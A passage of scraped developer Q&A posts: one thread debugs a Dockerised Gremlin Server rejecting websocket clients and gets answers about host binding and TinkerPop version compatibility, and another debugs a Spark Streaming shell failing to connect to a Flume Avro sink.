1/21/17 4:34:20 PM =============================================================
-- Meters ----------------------------------------------------------------------
org.apache.tinkerpop.gremlin.server.GremlinServer.errors
count = 0
mean rate = 0.00 events/second
1-minute rate = 0.00 events/second
5-minute rate = 0.00 events/second
15-minute rate = 0.00 events/second
180564 [metrics-logger-reporter-thread-1] INFO org.apache.tinkerpop.gremlin.server.Settings$Slf4jReporterMetrics - type=METER, name=org.apache.tinkerpop.gremlin.server.GremlinServer.errors, count=0, mean_rate=0.0, m1=0.0, m5=0.0, m15=0.0, rate_unit=events/second
Symptoms
So far, everything appears to be working as intended. The logs indicate that I am able to load srg.properties and bind the data structure to a variable called graph.
The problem appears when I try to connect to the Gremlin-Server instance over the exported port 8182, for example using gremlin-python:
# executed via python 3.6.0 on the host machine, i.e. not inside of Docker
from gremlin_python import statics
from gremlin_python.structure.graph import Graph
from gremlin_python.process.graph_traversal import __
from gremlin_python.process.strategies import *
from gremlin_python.driver.driver_remote_connection import DriverRemoteConnection
g = graph.traversal().withRemote(DriverRemoteConnection('ws://localhost:8182/gremlin','graph'))
produces the following exception ...
---------------------------------------------------------------------------
HTTPError Traceback (most recent call last)
<ipython-input-10-59ad504f29b4> in <module>()
----> 1 g = graph.traversal().withRemote(DriverRemoteConnection('ws://localhost:8182/','g'))
/Users/lthibault/.pyenv/versions/3.6.0/lib/python3.6/site-packages/gremlin_python/driver/driver_remote_connection.py in __init__(self, url, traversal_source, username, password, loop, graphson_reader, graphson_writer)
41 self._password = password
42 if loop is None: self._loop = ioloop.IOLoop.current()
---> 43 self._websocket = self._loop.run_sync(lambda: websocket.websocket_connect(self.url))
44 self._graphson_reader = graphson_reader or GraphSONReader()
45 self._graphson_writer = graphson_writer or GraphSONWriter()
/Users/lthibault/.pyenv/versions/3.6.0/lib/python3.6/site-packages/tornado/ioloop.py in run_sync(self, func, timeout)
455 if not future_cell[0].done():
456 raise TimeoutError('Operation timed out after %s seconds' % timeout)
--> 457 return future_cell[0].result()
458
459 def time(self):
/Users/lthibault/.pyenv/versions/3.6.0/lib/python3.6/site-packages/tornado/concurrent.py in result(self, timeout)
235 return self._result
236 if self._exc_info is not None:
--> 237 raise_exc_info(self._exc_info)
238 self._check_done()
239 return self._result
/Users/lthibault/.pyenv/versions/3.6.0/lib/python3.6/site-packages/tornado/util.py in raise_exc_info(exc_info)
HTTPError: HTTP 599: Stream closed
Suspecting a problem specific to this library:
1) attempt to connect to the websocket port with nc
$ nc -z -v localhost 8182
found 0 associations
found 1 connections:
1: flags=82<CONNECTED,PREFERRED>
outif lo0
src ::1 port 58627
dst ::1 port 8182
rank info not available
TCP aux info available
Connection to localhost port 8182 [tcp/*] succeeded!
2) attempt to connect to Gremlin-Server using a different client library, namely go-gremlin
Test case:
package main
import (
"fmt"
"log"
"github.com/go-gremlin/gremlin"
)
func main() {
if err := gremlin.NewCluster("ws://localhost:8182/gremlin"); err != nil {
log.Fatal(err)
}
data, err := gremlin.Query(`graph.V()`).Exec()
if err != nil {
log.Fatalf("Query error: %s", err)
}
fmt.Println(string(data))
}
Output:
$ go run cmd/test/main.go
2017/01/21 14:47:42 Query error: unexpected EOF
exit status 1
Current Conclusions & Questions
From the previous tests, I conclude that this is an application-level problem (i.e. a problem on the websocket or ws protocol level, not a problem in the host or container networking stack). Indeed, nc reports that the socket connection is successful, but in both the Python and Go client libraries ostensibly complain of an inappropriate (empty) response from the server.
I have tried removing the /gremlin path from the websocket URL both in gremlin-python and in go-gremlin, to no avail.
My question is: where do I go from here? Any suggestions or diagnostic paths would be most appreciated!
The main problem is that the host in your Gremlin Server configuration is set to the default which is localhost. This will only allow connections from the server itself. You need to change the value to an external IP of the server or 0.0.0.0.
The other issue is that gremlin-python server plugin was made available with Apache TinkerPop 3.2.2. Titan 1.0.0 uses TinkerPop 3.0.1. I dobut that the gremlin-python 3.2.3 plugin will work with Titan 1.0.0.
Update: Consider using JanusGraph 0.1.1 which uses TinkerPop 3.2.3. JanusGraph was forked from Titan, so the code is basically the same with updated dependencies.
I am trying to connect a scala spark-shell with a flume agent.
I launch the shell :
./bin/spark-shell
--jars /Users/romain/Informatique/zoo/spark-1.6.0-bin-hadoop2.4/lib/spark-streaming-flume-sink_2.10-1.6.0.jar
--jars /Users/romain/Informatique/zoo/spark-1.6.0-bin-hadoop2.4/lib/spark-streaming-flume_2.10-1.6.0.jar
--jars /Users/romain/Informatique/zoo/spark-1.6.0-bin-hadoop2.4/lib/spark-streaming-flume-assembly_2.10-1.6.0.jar
And launch a scala script to listen on port 10000 of localhost :
import org.apache.spark.SparkConf
import org.apache.spark.streaming._
import org.apache.spark.streaming.flume._
import org.apache.spark.util.IntParam
val host = "localhost"
val port = 10000
val batchInterval = Milliseconds(5000)
// Create the context and set the batch size
val sparkConf = new SparkConf().setAppName("FlumePollingEventCount")
val ssc = new StreamingContext(sc, batchInterval)
// Create a flume stream that polls the Spark Sink running in a Flume agent
val stream = FlumeUtils.createPollingStream(ssc, host, port)
// Print out the count of events received from this server in each batch
stream.count().map(cnt => "Received " + cnt + " flume events." ).print()
ssc.start()
ssc.awaitTermination()
Then I configure and start a shell agent :
1) configuration : I make a tail - f on a file appended by another running script (I think it doesn't matter to detail that here)
agent1.sources = source1
agent1.channels = channel1
agent1.sinks = spark
agent1.sources.source1.type = exec
agent1.sources.source1.command = tail -f /Users/romain/Informatique/notebooks/spark_scala/velib/logs/trajets.csv
agent1.sources.source1.channels = channel1
agent1.channels.channel1.type = memory
agent1.channels.channel1.capacity = 2000000
agent1.channels.channel1.transactionCapacity = 1000000
agent1.sinks = avroSink
agent1.sinks.avroSink.type = avro
agent1.sinks.avroSink.channel = channel1
agent1.sinks.avroSink.hostname = localhost
agent1.sinks.avroSink.port = 10000
2) start :
./bin/flume-ng agent --conf conf --conf-file ./conf/avro_velib.conf --name agent1 -Dflume.root.logger=INFO,console
And then things go ok till an error :
2017-02-01 15:09:55,688 (conf-file-poller-0) [INFO - org.apache.flume.node.Application.startAllComponents(Application.java:173)] Starting Sink avroSink
2017-02-01 15:09:55,688 (lifecycleSupervisor-1-1) [INFO - org.apache.flume.sink.AbstractRpcSink.start(AbstractRpcSink.java:289)] Starting RpcSink avroSink { host: localhost, port: 10000 }...
2017-02-01 15:09:55,688 (conf-file-poller-0) [INFO - org.apache.flume.node.Application.startAllComponents(Application.java:184)] Starting Source source1
2017-02-01 15:09:55,689 (lifecycleSupervisor-1-0) [INFO - org.apache.flume.source.ExecSource.start(ExecSource.java:169)] Exec source starting with command:tail -f /Users/romain/Informatique/notebooks/spark_scala/velib/logs/trajets.csv
2017-02-01 15:09:55,689 (lifecycleSupervisor-1-1) [INFO - org.apache.flume.instrumentation.MonitoredCounterGroup.register(MonitoredCounterGroup.java:120)] Monitored counter group for type: SINK, name: avroSink: Successfully registered new MBean.
2017-02-01 15:09:55,689 (lifecycleSupervisor-1-1) [INFO - org.apache.flume.instrumentation.MonitoredCounterGroup.start(MonitoredCounterGroup.java:96)] Component type: SINK, name: avroSink started
2017-02-01 15:09:55,689 (lifecycleSupervisor-1-1) [INFO - org.apache.flume.sink.AbstractRpcSink.createConnection(AbstractRpcSink.java:206)] Rpc sink avroSink: Building RpcClient with hostname: localhost, port: 10000
2017-02-01 15:09:55,689 (lifecycleSupervisor-1-1) [INFO - org.apache.flume.sink.AvroSink.initializeRpcClient(AvroSink.java:126)] Attempting to create Avro Rpc client.
2017-02-01 15:09:55,691 (lifecycleSupervisor-1-0) [INFO - org.apache.flume.instrumentation.MonitoredCounterGroup.register(MonitoredCounterGroup.java:120)] Monitored counter group for type: SOURCE, name: source1: Successfully registered new MBean.
2017-02-01 15:09:55,692 (lifecycleSupervisor-1-0) [INFO - org.apache.flume.instrumentation.MonitoredCounterGroup.start(MonitoredCounterGroup.java:96)] Component type: SOURCE, name: source1 started
2017-02-01 15:09:55,710 (lifecycleSupervisor-1-1) [WARN - org.apache.flume.api.NettyAvroRpcClient.configure(NettyAvroRpcClient.java:634)] Using default maxIOWorkers
2017-02-01 15:10:15,802 (lifecycleSupervisor-1-1) [WARN - org.apache.flume.sink.AbstractRpcSink.start(AbstractRpcSink.java:294)] Unable to create Rpc client using hostname: localhost, port: 10000
org.apache.flume.FlumeException: NettyAvroRpcClient { host: localhost, port: 10000 }: RPC connection error
at org.apache.flume.api.NettyAvroRpcClient.connect(NettyAvroRpcClient.java:182)
at org.apache.flume.api.NettyAvroRpcClient.connect(NettyAvroRpcClient.java:121)
at org.apache.flume.api.NettyAvroRpcClient.configure(NettyAvroRpcClient.java:638)
at org.apache.flume.api.RpcClientFactory.getInstance(RpcClientFactory.java:89)
at org.apache.flume.sink.AvroSink.initializeRpcClient(AvroSink.java:127)
at org.apache.flume.sink.AbstractRpcSink.createConnection(AbstractRpcSink.java:211)
at org.apache.flume.sink.AbstractRpcSink.start(AbstractRpcSink.java:292)
at org.apache.flume.sink.DefaultSinkProcessor.start(DefaultSinkProcessor.java:46)
at org.apache.flume.SinkRunner.start(SinkRunner.java:79)
at org.apache.flume.lifecycle.LifecycleSupervisor$MonitorRunnable.run(LifecycleSupervisor.java:251)
at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
at java.util.concurrent.FutureTask.runAndReset(FutureTask.java:308)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$301(ScheduledThreadPoolExecutor.java:180)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:294)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)
Caused by: java.io.IOException: Error connecting to localhost/127.0.0.1:10000
at org.apache.avro.ipc.NettyTransceiver.getChannel(NettyTransceiver.java:261)
at org.apache.avro.ipc.NettyTransceiver.<init>(NettyTransceiver.java:203)
at org.apache.avro.ipc.NettyTransceiver.<init>(NettyTransceiver.java:152)
at org.apache.flume.api.NettyAvroRpcClient.connect(NettyAvroRpcClient.java:168)
... 16 more
Any idea welcom
You should start "listenner"(spark app in your case) first and then launch "writer" (flume-ng)
Instead of localhost use your machine name i.e (machine name used in spark conf) in both scala and avroconf.
agent1.sinks.avroSink.hostname = <Machine name>
agent1.sinks.avroSink.port = 10000